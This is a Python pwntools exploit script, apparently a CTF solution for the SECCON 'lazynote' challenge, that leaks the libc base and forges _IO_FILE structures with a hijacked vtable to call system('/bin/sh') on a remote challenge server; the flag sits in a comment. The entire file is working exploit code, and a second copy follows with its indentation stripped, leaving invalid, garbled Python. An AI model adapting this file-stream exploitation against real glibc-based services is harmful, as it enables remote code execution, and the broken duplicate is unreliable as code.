hkraw/lazynote_expl.py

## lazynote_expl.py
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
from IO_FILE import *
import random

#Utils
def allocate(alloc_size,read_size,data,silent=False):
	if silent==False:
		io.sendlineafter('> ','1')
		io.sendlineafter('size: ',f'{alloc_size}')
		io.sendlineafter('size: ',f'{read_size}')
		io.sendlineafter('data: ',data)
	else:
		io.sendline('1')
		io.sendline(f'{alloc_size}')
		io.sendline(f'{read_size}')
		io.sendline(data)

#Addr libc 2.27
_IO_2_1_stdout_ = 0x3ec760
_IO_2_1_stdin_ = 0x3eba00
system = 0x4f4e0
str_binsh = 0x1b40fa
_IO_list_all = 0x3ec660
_IO_file_jumps = 0x3e82a0
_IO_str_jumps = _IO_file_jumps+0xc0
_IO_str_overflow = _IO_str_jumps+0x18

#Size
alloc_size = 0x3444444
read_size = 0x3445000

#Exploit
if __name__ =='__main__':
#	io = process('./chall_ld',env={'LD_PRELOAD':'./libc-2.27.so'})
	io = remote('pwn-neko.chal.seccon.jp',9003)
	allocate(alloc_size,read_size+_IO_2_1_stdout_-0xf+0x10,'HK')
	allocate(alloc_size,read_size*2+_IO_2_1_stdout_-0xf+0x20,'HK',silent=True)
	libc_base = u64(io.recvn(0x10)[0x8:]) - 0x3ed8b0
	print(hex(libc_base))

	allocate(alloc_size,read_size*3+_IO_2_1_stdin_-0xf+0x38,'1')

	IO_file = IO_FILE_plus(arch=64)
	stream = IO_file.construct(
		flags=0xfbad208b,
		read_ptr=libc_base+_IO_2_1_stdin_+0x50+1,
		read_end=libc_base+_IO_2_1_stdin_+0x50+1-83,
		read_base=libc_base+_IO_2_1_stdin_+0x50,
		write_base=libc_base+_IO_2_1_stdin_+0x50,
		write_ptr=libc_base+_IO_2_1_stdin_+0x50,
		write_end=libc_base+_IO_2_1_stdin_+0x50,
		buf_base=libc_base+_IO_2_1_stdout_,
		buf_end=libc_base+_IO_2_1_stdout_+0x100
	)

	io.sendlineafter('> ',stream[0x0:0x50]+b' 1')
	stdout_stream = IO_file.construct(
		flags=0,buf_base=0,
		buf_end=(libc_base+str_binsh-100)//2,write_ptr=(libc_base+str_binsh-100)//2,
		write_base=0,
		lock=libc_base+_IO_list_all+0x8,
		vtable=libc_base+_IO_str_overflow-0x38)
	stdout_stream += p64(libc_base+system)
	io.sendline(stdout_stream)
#	SECCON{r3l4t1v3_nu11_wr1t3_pr1m1t1v3_2_sh3ll}
	io.interactive()
	#!/usr/bin/python3
	from pwn import *
	from past.builtins import xrange
	from time import sleep
	from IO_FILE import *
	import random

	#Utils
	def allocate(alloc_size,read_size,data,silent=False):
	if silent==False:
	io.sendlineafter('> ','1')
	io.sendlineafter('size: ',f'{alloc_size}')
	io.sendlineafter('size: ',f'{read_size}')
	io.sendlineafter('data: ',data)
	else:
	io.sendline('1')
	io.sendline(f'{alloc_size}')
	io.sendline(f'{read_size}')
	io.sendline(data)

	#Addr libc 2.27
	_IO_2_1_stdout_ = 0x3ec760
	_IO_2_1_stdin_ = 0x3eba00
	system = 0x4f4e0
	str_binsh = 0x1b40fa
	_IO_list_all = 0x3ec660
	_IO_file_jumps = 0x3e82a0
	_IO_str_jumps = _IO_file_jumps+0xc0
	_IO_str_overflow = _IO_str_jumps+0x18

	#Size
	alloc_size = 0x3444444
	read_size = 0x3445000

	#Exploit
	if __name__ =='__main__':
	# io = process('./chall_ld',env={'LD_PRELOAD':'./libc-2.27.so'})
	io = remote('pwn-neko.chal.seccon.jp',9003)
	allocate(alloc_size,read_size+_IO_2_1_stdout_-0xf+0x10,'HK')
	allocate(alloc_size,read_size*2+_IO_2_1_stdout_-0xf+0x20,'HK',silent=True)
	libc_base = u64(io.recvn(0x10)[0x8:]) - 0x3ed8b0
	print(hex(libc_base))

	allocate(alloc_size,read_size*3+_IO_2_1_stdin_-0xf+0x38,'1')

	IO_file = IO_FILE_plus(arch=64)
	stream = IO_file.construct(
	flags=0xfbad208b,
	read_ptr=libc_base+_IO_2_1_stdin_+0x50+1,
	read_end=libc_base+_IO_2_1_stdin_+0x50+1-83,
	read_base=libc_base+_IO_2_1_stdin_+0x50,
	write_base=libc_base+_IO_2_1_stdin_+0x50,
	write_ptr=libc_base+_IO_2_1_stdin_+0x50,
	write_end=libc_base+_IO_2_1_stdin_+0x50,
	buf_base=libc_base+_IO_2_1_stdout_,
	buf_end=libc_base+_IO_2_1_stdout_+0x100
	)

	io.sendlineafter('> ',stream[0x0:0x50]+b' 1')
	stdout_stream = IO_file.construct(
	flags=0,buf_base=0,
	buf_end=(libc_base+str_binsh-100)//2,write_ptr=(libc_base+str_binsh-100)//2,
	write_base=0,
	lock=libc_base+_IO_list_all+0x8,
	vtable=libc_base+_IO_str_overflow-0x38)
	stdout_stream += p64(libc_base+system)
	io.sendline(stdout_stream)
	# SECCON{r3l4t1v3_nu11_wr1t3_pr1m1t1v3_2_sh3ll}
	io.interactive()